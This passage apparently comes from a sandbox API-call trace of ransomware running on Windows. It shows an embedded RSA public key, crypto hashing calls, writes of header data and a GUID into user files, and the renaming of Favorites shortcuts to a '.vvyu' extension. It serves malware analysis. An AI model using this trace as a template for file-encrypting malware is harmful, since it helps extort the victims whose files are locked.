KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.377] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.378] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.378] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.378] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.378] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.378] GetLastError () returned 0x0 [0193.378] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.378] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.379] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.379] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.379] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0193.379] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3e88 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3ed0 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.380] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0193.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0193.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae62f0 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0193.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0193.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.382] GetCurrentThreadId () returned 0x5d8 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7b18 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.383] GetCurrentThreadId () returned 0x5d8 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0193.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3ed0 | out: hHeap=0x2c0000) returned 1 [0193.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.394] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0193.395] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.395] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.396] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.396] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.396] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.397] CloseHandle (hObject=0x584) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0193.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.398] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url.vvyu")) returned 1 [0193.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.400] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.402] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0193.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0193.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.403] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0193.403] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.429] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.430] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.450] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.450] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.513] HeapFree (in: 